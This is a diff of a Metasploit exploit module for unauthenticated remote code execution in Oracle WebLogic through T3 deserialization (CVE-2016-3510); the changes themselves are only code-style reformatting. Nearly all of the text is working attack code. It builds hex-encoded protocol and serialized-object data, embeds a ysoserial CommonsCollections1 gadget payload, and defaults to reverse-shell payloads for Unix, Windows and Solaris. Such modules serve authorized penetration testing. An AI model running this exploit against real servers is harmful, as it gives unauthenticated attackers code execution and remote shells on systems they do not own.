@@ -3,58 +3,59 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::JavaDeserialization
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name' => 'Oracle Weblogic Server Deserialization RCE - MarshalledObject',
-      'Description' => %q{
-        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
-        interface can send a serialized object (weblogic.corba.utils.MarshalledObject)
-        to the interface to execute code on vulnerable hosts.
-      },
-      'Author' =>
-        [
-        'Andres Rodriguez',  # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
-        'Jacob Baines',      # Vulnerability Discovery - Tenable Network Security
-        'Aaron Soto',        # Reverse Engineering JSO and ysoserial blobs
-        'Steve Embling'      # T3S support
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle Weblogic Server Deserialization RCE - MarshalledObject',
+        'Description' => %q{
+          An unauthenticated attacker with network access to the Oracle Weblogic Server T3
+          interface can send a serialized object (weblogic.corba.utils.MarshalledObject)
+          to the interface to execute code on vulnerable hosts.
+        },
+        'Author' => [
+          'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)
+          'Jacob Baines',      # Vulnerability Discovery - Tenable Network Security
+          'Aaron Soto',        # Reverse Engineering JSO and ysoserial blobs
+          'Steve Embling'      # T3S support
         ],
-      'License' => MSF_LICENSE,
-      'References' =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           ['CVE', '2016-3510']
         ],
-      'Privileged' => false,
-      'Platform' => %w{ unix win solaris },
-      'Targets' =>
-        [
-          [ 'Unix',
+        'Privileged' => false,
+        'Platform' => %w{unix win solaris},
+        'Targets' => [
+          [
+            'Unix',
             'Platform' => 'unix',
             'Arch' => ARCH_CMD,
-            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
+            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' },
             'Payload' => {
-              'Compat' => {'PayloadType' => 'cmd'}
+              'Compat' => { 'PayloadType' => 'cmd' }
             }
           ],
-          [ 'Windows',
+          [
+            'Windows',
             'Platform' => 'win',
             'Payload' => {},
-            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
+            'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
           ],
-          [ 'Solaris',
+          [
+            'Solaris',
             'Platform' => 'solaris',
             'Arch' => ARCH_CMD,
-            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
+            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
             'Payload' => {
-              'Space'       => 2048,
+              'Space' => 2048,
               'DisableNops' => true,
-              'Compat'      =>
+              'Compat' =>
                 {
                   'PayloadType' => 'cmd',
                   'RequiredCmd' => 'generic perl telnet',
@@ -62,22 +63,24 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'DefaultTarget' => 0,
-      'DefaultOptions' => { 'WfsDelay' => 12 },
-      'DisclosureDate' => '2016-07-19',
-      'Notes' => {
-        'Reliability' => [REPEATABLE_SESSION],
-        'Stability' => [CRASH_SAFE],
-        'SideEffects' => [IOC_IN_LOGS]
-      }))
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'WfsDelay' => 12 },
+        'DisclosureDate' => '2016-07-19',
+        'Notes' => {
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
 
-      register_options([
-        Opt::RPORT(7001),
-      ])
+    register_options([
+      Opt::RPORT(7001),
+    ])
 
-      register_advanced_options([
-        OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
-      ])
+    register_advanced_options([
+      OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
+    ])
   end
 
 =begin   This check is currently incompatible with the Tcp mixin.  :-(
@@ -137,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # retrieved by watching network traffic
     # This is a proprietary, undocumented protocol
     # TODO: WHAT DOES THIS DO?  CAN WE RANDOMIZE ANY OF IT?
-    data =  '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
+    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
     data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
     data << '700000000a000000030000000000000006007070707070700000000a00000003'
     data << '0000000000000006007006'
@@ -309,7 +312,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data << '21'                                           #   !
     data << '000000000000000000'                           #   9 NULL BYTES
     data << '0d'                                           #   \n
-    data << '3139322e3136382e312e323237'                         #   192.168.1.227
+    data << '3139322e3136382e312e323237' #   192.168.1.227
     data << '00'                                           #   \0
     data << '12'                                           #      #TODO: UNKNOWN
     data << '57494e2d4147444d56515542315436'               #   WIN-AGDMVQUB1T6
@@ -440,7 +443,7 @@ class MetasploitModule < Msf::Exploit::Remote
     objdata << '5b00086f626a4279746573'                    #     1: Array: objBytes
     objdata << '7400025b42'                                #        Value: 0x5b42
     objdata << '7870'                                      #     class footer
-                                                           #   class Data:
+    #   class Data:
     objdata << '21210fdc'                                  #     hash = 0x21210fdc (555814876d)
     objdata << '757200025b42'                              #     objBytes = [ 0x5b42 ]
     objdata << 'acf317f8060854e0'                          #     serialVersionUID
@@ -451,8 +454,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # java -jar ysoserial-0.0.5-all.jar CommonsCollections1 calc.exe
     java_payload = generate_java_deserialization_for_payload('CommonsCollections1', payload)
-    objdata << (java_payload.length).to_s(16).rjust(4, '0')# arraySize (lower two bytes)
-    objdata << java_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
+    objdata << (java_payload.length).to_s(16).rjust(4, '0') # arraySize (lower two bytes)
+    objdata << java_payload.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
 
     # basic weblogic ImmutableServiceContext object (serialized)
     objdata << 'fe010000'                                  # ----- separator -----
@@ -496,7 +499,7 @@ class MetasploitModule < Msf::Exploit::Remote
     objdata << 'fe00ff'                                    # this cruft again.  some kind of footer
 
     # sets the length of the stream
-    data = ((objdata.length >> 1) + 4).to_s(16).rjust(8,'0')
+    data = ((objdata.length >> 1) + 4).to_s(16).rjust(8, '0')
     data << objdata
 
     sock.put([data].pack('H*'))
